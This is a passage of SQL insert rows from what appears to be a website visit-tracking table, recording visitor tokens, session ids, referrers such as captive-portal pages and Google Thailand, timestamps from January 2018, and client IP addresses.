(369, '320', '634', 0, 0, 'RPKVAwiTWFdh0zFZkW16JE2W66NsDF1OewM', 0, 'f0b730r9fg6052oj2oaqb7chg5', 'http://192.168.10.253:8002/index.php?zone=vlan_captive', '2018-01-17 10:13:33', '192.168.10.86'),
(370, '160', '634', 0, 0, 'u282tmS0C8F2w9rTPDOafFTOarDKyfVieN8', 0, '88gr4ba95sd6n84043v2f9p0g6', 'http://40.40.15.253:8028/index.php?zone=vlan200', '2018-01-17 10:53:51', '20.20.3.185'),
(371, '160', '634', 0, 0, 'cq1cZLAGGDXB0I54bSWrZ03eIT9nvedH2Tn', 0, '27ib3k0d1q1dfdanv1tt6pfdl4', 'http://20.20.15.253:8028/index.php?zone=vlan200', '2018-01-17 10:57:18', '20.20.9.178'),
(372, '160', '634', 0, 0, 'uLIeFN2lgNX1kEpNbguz2DOiOL4u0zC3xXw', 0, '58kfssgc518qnsqptcni4ikbf4', 'http://www.google.co.th/', '2018-01-17 11:09:20', '1.47.4.235'),
(373, '160', '634', 0, 0, 'cq1cZLAGGDXB0I54bSWrZ03eIT9nvedH2Tn', 0, '27ib3k0d1q1dfdanv1tt6pfdl4', 'http://20.20.15.253:8028/index.php?zone=vlan200', '2018-01-17 11:38:54', '223.24.177.24'),
(374, '160', '634', 0, 0, 'O489nELaDg761khbnQf6QX1wGU1nB9kn8Hk', 0, 'lvojqsg6ngdnntdghdd4kttem5', 'http://40.40.15.253:8028/index.php?zone=vlan200', '2018-01-17 11:49:23', '40.40.8.121'),
(375, '160', '634', 0, 0, '6UUJpKqn2xcpLT5Tf7N07P4Pxym7kUU5FJ6', 0, '0qeapps32610g4qfonnqni31h0', 'http://www.google.co.th/', '2018-01-17 11:53:18', '223.24.94.160'),
(376, '160', '634', 0, 0, 'HXcE59SLtxeJMfhGWdzatObGElSEIf8SchJ', 0, '5uirkqsiri38hrub9gdseivcd1', 'http://20.20.15.253:8028/index.php?zone=vlan200', '2018-01-17 12:13:12', '20.20.3.88'),
(377, '160', '634', 0, 0, 'rk9873dZQUWhrTN0gHW5uLgAv3yVrsOB232', 0, '1eblkaisg77sn047esavsqnk62', 'Direct Traffic', '2018-01-17 13:40:31', '1.46.141.144'),
(378, '160', '634', 0, 0, 'oguNT8U4CiODOKVDFOq3l9Kas1niIFZw8e8', 0, '3a2fdvd2r4rg6fdkmv1ncbc395', 'http://20.20.15.253:8028/index.php?zone=vlan200', '2018-01-17 14:07:17', '40.40.3.95'),
(379, '160', '634', 0, 0, 'RPKVAwiTWFdh0zFZkW16JE2W66NsDF1OewM', 0, 'f0b730r9fg6052oj2oaqb7chg5', 'http://192.168.10.253:8002/index.php?zone=vlan_captive', '2018-01-17 15:02:06', '40.40.1.142'),
(380, '160', '622', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 17:20:16', '192.168.10.71'),
(381, '160', '624', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 17:20:16', '192.168.10.71'),
(382, '160', '625', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 17:20:16', '192.168.10.71'),
(383, '160', '626', 1, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 17:20:16', '192.168.10.71'),
(384, '160', '633', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 17:20:16', '192.168.10.71'),
(385, '160', '634', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 17:20:16', '192.168.10.71'),
(386, '160', '634', 0, 0, 'BsIHoExe0mTLeGRoWXXshEzxTIUAQGyZ9ST', 0, 'sv89939903k6nlpopi1qejvfm4', 'http://192.168.10.253:8002/index.php?zone=vlan_captive', '2018-01-17 17:39:34', '192.168.10.21'),
(387, '160', '622', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 17:46:44', '192.168.10.71'),
(388, '160', '624', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 17:46:44', '192.168.10.71'),
(389, '160', '625', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 17:46:44', '192.168.10.71'),
(390, '160', '626', 1, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 17:46:44', '192.168.10.71'),
(391, '160', '633', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 17:46:44', '192.168.10.71'),
(392, '160', '634', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 17:46:44', '192.168.10.71'),
(393, '160', '622', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 17:46:51', '192.168.10.71'),
(394, '160', '624', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 17:46:51', '192.168.10.71'),
(395, '160', '625', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 17:46:51', '192.168.10.71'),
(396, '160', '626', 1, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 17:46:51', '192.168.10.71'),
(397, '160', '633', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 17:46:51', '192.168.10.71'),
(398, '160', '634', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 17:46:51', '192.168.10.71'),
(399, '160', '622', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 17:46:58', '192.168.10.71'),
(400, '160', '624', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 17:46:58', '192.168.10.71'),
(401, '160', '625', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 17:46:58', '192.168.10.71'),
(402, '160', '626', 1, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 17:46:58', '192.168.10.71'),
(403, '160', '633', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 17:46:58', '192.168.10.71'),
(404, '160', '634', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 17:46:58', '192.168.10.71'),
(405, '160', '634', 0, 0, 'DRvBo2pkJ8fKexkWLEapLNr8BcZ3nzNIuiV', 0, '9u9ak581a263htmm4tht5mrn55', 'https://www.google.co.th/', '2018-01-17 17:48:29', '1.47.108.87'),
(406, '160', '634', 0, 0, 'DRvBo2pkJ8fKexkWLEapLNr8BcZ3nzNIuiV', 0, '9u9ak581a263htmm4tht5mrn55', 'https://www.google.co.th/', '2018-01-17 17:50:11', '1.47.108.87'),
(407, '587', '634', 0, 0, 'DRvBo2pkJ8fKexkWLEapLNr8BcZ3nzNIuiV', 0, '9u9ak581a263htmm4tht5mrn55', 'https://www.google.co.th/', '2018-01-17 17:50:44', '1.47.108.87'),
(408, '287', '634', 0, 0, 'DRvBo2pkJ8fKexkWLEapLNr8BcZ3nzNIuiV', 0, '9u9ak581a263htmm4tht5mrn55', 'https://www.google.co.th/', '2018-01-17 17:50:57', '1.47.108.87'),
(409, '160', '634', 0, 0, 'DRvBo2pkJ8fKexkWLEapLNr8BcZ3nzNIuiV', 0, '9u9ak581a263htmm4tht5mrn55', 'https://www.google.co.th/', '2018-01-17 17:52:02', '1.47.108.87'),
(410, '160', '622', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:08:38', '192.168.10.71'),
(411, '160', '624', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:08:38', '192.168.10.71'),
(412, '160', '625', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:08:38', '192.168.10.71'),
(413, '160', '626', 1, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:08:38', '192.168.10.71'),
(414, '160', '633', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:08:38', '192.168.10.71'),
(415, '160', '634', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:08:38', '192.168.10.71'),
(416, '160', '622', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:08:41', '192.168.10.71'),
(417, '160', '624', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:08:41', '192.168.10.71'),
(418, '160', '625', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:08:41', '192.168.10.71'),
(419, '160', '626', 1, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:08:41', '192.168.10.71'),
(420, '160', '633', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:08:41', '192.168.10.71'),
(421, '160', '634', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:08:41', '192.168.10.71'),
(422, '160', '622', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:08:41', '192.168.10.71'),
(423, '160', '624', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:08:41', '192.168.10.71'),
(424, '160', '625', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:08:41', '192.168.10.71'),
(425, '160', '626', 1, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:08:41', '192.168.10.71'),
(426, '160', '633', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:08:41', '192.168.10.71'),
(427, '160', '634', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:08:41', '192.168.10.71'),
(428, '160', '622', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:08:41', '192.168.10.71'),
(429, '160', '624', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:08:41', '192.168.10.71'),
(430, '160', '625', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:08:41', '192.168.10.71'),
(431, '160', '626', 1, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:08:41', '192.168.10.71'),
(432, '160', '633', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:08:41', '192.168.10.71'),
(433, '160', '634', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:08:41', '192.168.10.71'),
(434, '160', '622', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:10:59', '192.168.10.71'),
(435, '160', '624', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:10:59', '192.168.10.71'),
(436, '160', '625', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:10:59', '192.168.10.71'),
(437, '160', '626', 1, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:10:59', '192.168.10.71'),
(438, '160', '633', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:10:59', '192.168.10.71'),
(439, '160', '634', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:10:59', '192.168.10.71'),
(440, '160', '622', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:13:05', '192.168.10.71'),
(441, '160', '624', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:13:05', '192.168.10.71'),
(442, '160', '625', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:13:05', '192.168.10.71'),
(443, '160', '626', 1, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:13:05', '192.168.10.71'),
(444, '160', '633', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:13:05', '192.168.10.71'),
(445, '160', '634', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:13:05', '192.168.10.71'),
(446, '160', '634', 0, 0, 'RPKVAwiTWFdh0zFZkW16JE2W66NsDF1OewM', 0, 'f0b730r9fg6052oj2oaqb7chg5', 'http://192.168.10.253:8002/index.php?zone=vlan_captive', '2018-01-17 18:17:49', '40.40.1.142'),
(447, '160', '622', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:19:09', '192.168.10.71'),
(448, '160', '624', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:19:09', '192.168.10.71'),
(449, '160', '625', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:19:09', '192.168.10.71'),
(450, '160', '626', 1, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:19:09', '192.168.10.71'),
(451, '160', '633', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:19:09', '192.168.10.71'),
(452, '160', '634', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:19:09', '192.168.10.71'),
(453, '160', '622', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:30:21', '192.168.10.71'),
(454, '160', '624', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:30:21', '192.168.10.71'),
(455, '160', '625', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:30:21', '192.168.10.71'),
(456, '160', '626', 1, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:30:21', '192.168.10.71'),
(457, '160', '633', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:30:21', '192.168.10.71'),
(458, '160', '634', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:30:21', '192.168.10.71'),
(459, '160', '622', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:30:24', '192.168.10.71'),
(460, '160', '624', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:30:24', '192.168.10.71'),
(461, '160', '625', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:30:24', '192.168.10.71'),
(462, '160', '626', 1, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:30:24', '192.168.10.71'),
(463, '160', '633', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:30:24', '192.168.10.71'),
(464, '160', '634', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:30:24', '192.168.10.71'),
(465, '160', '622', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:31:21', '192.168.10.71'),
(466, '160', '624', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:31:21', '192.168.10.71'),
(467, '160', '625', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:31:21', '192.168.10.71'),
(468, '160', '626', 1, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:31:21', '192.168.10.71'),
(469, '160', '633', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:31:21', '192.168.10.71'),
(470, '160', '634', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:31:21', '192.168.10.71'),
(471, '160', '622', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:31:37', '192.168.10.71'),
(472, '160', '624', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:31:37', '192.168.10.71'),
(473, '160', '625', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:31:37', '192.168.10.71'),
(474, '160', '626', 1, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:31:37', '192.168.10.71'),
(475, '160', '633', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:31:37', '192.168.10.71'),
(476, '160', '634', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:31:37', '192.168.10.71'),
(477, '160', '622', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:31:43', '192.168.10.71'),
(478, '160', '624', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:31:43', '192.168.10.71'),
(479, '160', '625', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:31:43', '192.168.10.71'),
(480, '160', '626', 1, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:31:43', '192.168.10.71'),
(481, '160', '633', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:31:43', '192.168.10.71'),
(482, '160', '634', 0, 0, 'OkH7KCc4WT0gcXI5rd9Tc39pfQXm27dE8xd', 0, 'trg17rf6o3v05voujtav44gd34', 'Direct Traffic', '2018-01-17 18:31:43', '192.168.10.71'),
(483, '160', '634', 0, 0, 'f5eSLxqc2nI3E1LGh1bnSUzFn6E23weykar', 0, 'mqq7vl9g5399l7d9lcgcc4off3', 'http://192.168.10.253:8002/index.php?zone=vlan_captive', '2018-01-18 06:55:27', '192.168.10.21'),
(484, '160', '634', 0, 0, 'u282tmS0C8F2w9rTPDOafFTOarDKyfVieN8', 0, '88gr4ba95sd6n84043v2f9p0g6', 'http://40.40.15.253:8028/index.php?zone=vlan200', '2018-01-18 08:53:15', '40.40.1.66'),
(485, '160', '634', 0, 0, 'xECtCVfPOkK6xPuHCKT8gX8KfLAVk327hmt', 0, 'o2uut79j6kh527h3s90uc394f7', 'http://20.20.15.253:8028/index.php?zone=vlan200', '2018-01-18 09:09:12', '20.20.3.88'),
(486, '160', '634', 0, 0, 'Sk5CCq2MTyEbJPrJdtCKlbGhhTAmxPJUZM6', 0, '5bh9v8p610tv8frrd01gucen37', 'http://192.168.10.253:8002/index.php?zone=vlan_captive', '2018-01-18 09:32:23', '192.168.10.86'),
(487, '160', '634', 0, 0, 'Sk5CCq2MTyEbJPrJdtCKlbGhhTAmxPJUZM6', 0, '5bh9v8p610tv8frrd01gucen37', 'http://192.168.10.253:8002/index.php?zone=vlan_captive', '2018-01-18 10:03:15', '192.168.10.86'),
(488, '160', '634', 0, 0, 'UgpkkFCN4wqRurT1qlhP22fT2M2bVLbHENl', 0, '0flvimumvj5elcuih39scu3tj4', 'http://20.20.15.253:8028/index.php?zone=vlan200', '2018-01-18 13:41:26', '20.20.3.88'),
(489, '160', '634', 0, 0, 'NXFtAx3vynuoa8pEAwDvPWPRMi4iIas88wA', 0, '0sur049353d9e2lqbkvrqb1183', 'http://192.168.10.253:8002/index.php?zone=vlan_captive', '2018-01-18 13:53:25', '192.168.10.21'),
(490, '160', '634', 0, 0, 'u282tmS0C8F2w9rTPDOafFTOarDKyfVieN8', 0, '88gr4ba95sd6n84043v2f9p0g6', 'http://40.40.15.253:8028/index.php?zone=vlan200', '2018-01-18 15:28:05', '40.40.1.66'),
(491, '160', '634', 0, 0, 'W9Cq750nPWCqZKAuMHsX8gSpn2r4qFhThI4', 0, 'kgbb4cqo0p311c010f31e9v681', 'Direct Traffic', '2018-01-18 16:22:36', '192.168.30.13'),
(492, '160', '634', 0, 0, 'kJP0qUDHykqTRUTtgmvFwVrVESfRT7S9lNu', 0, 'f8oa44pjigt3pit1j9ulbpesn1', 'http://192.168.31.253:8014/index.php?zone=vlan31', '2018-01-18 16:24:31', '192.168.31.116'),
(493, '160', '634', 0, 0, 'W9Cq750nPWCqZKAuMHsX8gSpn2r4qFhThI4', 0, 'kgbb4cqo0p311c010f31e9v681', 'Direct Traffic', '2018-01-18 16:25:38', '192.168.30.13'),
(494, '160', '634', 0, 0, 'W9Cq750nPWCqZKAuMHsX8gSpn2r4qFhThI4', 0, 'kgbb4cqo0p311c010f31e9v681', 'Direct Traffic', '2018-01-18 16:46:46', '192.168.30.13'),
(495, '160', '634', 0, 0, 'W9Cq750nPWCqZKAuMHsX8gSpn2r4qFhThI4', 0, 'kgbb4cqo0p311c010f31e9v681', 'Direct Traffic', '2018-01-18 16:47:22', '192.168.30.13'),
(496, '160', '634', 0, 0, 'W9Cq750nPWCqZKAuMHsX8gSpn2r4qFhThI4', 0, 'kgbb4cqo0p311c010f31e9v681', 'Direct Traffic', '2018-01-18 16:47:43', '192.168.30.13'),
(497, '160', '634', 0, 0, 'W9Cq750nPWCqZKAuMHsX8gSpn2r4qFhThI4', 0, 'kgbb4cqo0p311c010f31e9v681', 'Direct Traffic', '2018-01-18 16:47:47', '192.168.30.13'),
(498, '160', '634', 0, 0, 'W9Cq750nPWCqZKAuMHsX8gSpn2r4qFhThI4', 0, 'kgbb4cqo0p311c010f31e9v681', 'Direct Traffic', '2018-01-18 16:48:03', '192.168.30.13'),
(499, '287', '634', 0, 0, 'W9Cq750nPWCqZKAuMHsX8gSpn2r4qFhThI4', 0, 'kgbb4cqo0p311c010f31e9v681', 'Direct Traffic', '2018-01-18 16:48:05', '192.168.30.13'),
